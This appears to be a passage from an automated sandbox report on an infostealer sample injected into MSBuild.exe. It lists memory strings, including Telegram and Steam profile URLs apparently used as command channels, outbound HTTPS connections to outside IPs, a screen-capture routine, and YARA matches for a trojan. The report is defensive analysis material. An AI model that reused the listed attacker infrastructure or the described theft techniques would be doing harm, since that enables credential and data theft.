Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BFHDAE.1.dr	String found in binary or memory: https://support.mozilla.org
Source: BFHDAE.1.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BFHDAE.1.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001167000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2627587707.000000000620C000.00000004.00000020.00020000.00000000.sdmp, CFHCGH.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: CFHCGH.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001167000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2627587707.000000000620C000.00000004.00000020.00020000.00000000.sdmp, CFHCGH.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: CFHCGH.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/Q
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/armad2a
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2617277364.000000000044B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/s41l0
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001038000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/s41l0#69
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/s41l06#goMozilla/5.0
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/s41l0iU
Source: MSBuild.exe, 00000006.00000002.2617277364.000000000044B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BFHDAE.1.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BFHDAE.1.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: BFHDAE.1.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: BFHDAE.1.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BFHDAE.1.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000001.00000002.2404984973.000000001973C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: BFHDAE.1.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.108.151.108:443 -> 192.168.2.4:49781 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00411530 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

1_2_00411530

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.MSBuild.exe.428038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 1.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C58ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	1_2_6C58ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C5CB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5CB8C0 rand_s,NtQueryVirtualMemory,	1_2_6C5CB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6C5CB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C56F280

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_0313EF68	0_2_0313EF68
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_0313878B	0_2_0313878B
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_031387B8	0_2_031387B8
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_03138A10	0_2_03138A10
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_031389FF	0_2_031389FF
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_0313AF2A	0_2_0313AF2A
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B65578	0_2_05B65578
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B69C98	0_2_05B69C98
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B62C18	0_2_05B62C18
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B66780	0_2_05B66780
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B65568	0_2_05B65568
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B69C92	0_2_05B69C92
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B62C08	0_2_05B62C08
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B677E0	0_2_05B677E0
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B677D0	0_2_05B677D0
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B66770	0_2_05B66770
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B6B3B8	0_2_05B6B3B8
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B6B3C8	0_2_05B6B3C8
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B68A78	0_2_05B68A78
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_05B68A68	0_2_05B68A68
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_06051B10	0_2_06051B10
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_06053201	0_2_06053201
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 0_2_06053036	0_2_06053036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041BD50	1_2_0041BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041A130	1_2_0041A130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00419B58	1_2_00419B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00419B30	1_2_00419B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5635A0	1_2_6C5635A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D545C	1_2_6C5D545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C575440	1_2_6C575440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A5C10	1_2_6C5A5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5B2C10	1_2_6C5B2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5DAC00	1_2_6C5DAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D542B	1_2_6C5D542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C58D4D0	1_2_6C58D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5764C0	1_2_6C5764C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A6CF0	1_2_6C5A6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56D4E0	1_2_6C56D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C576C80	1_2_6C576C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5C34A0	1_2_6C5C34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5CC4A0	1_2_6C5CC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C58ED10	1_2_6C58ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C590512	1_2_6C590512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C57FD00	1_2_6C57FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A0DD0	1_2_6C5A0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5C85F0	1_2_6C5C85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C589E50	1_2_6C589E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A3E50	1_2_6C5A3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5B2E4E	1_2_6C5B2E4E
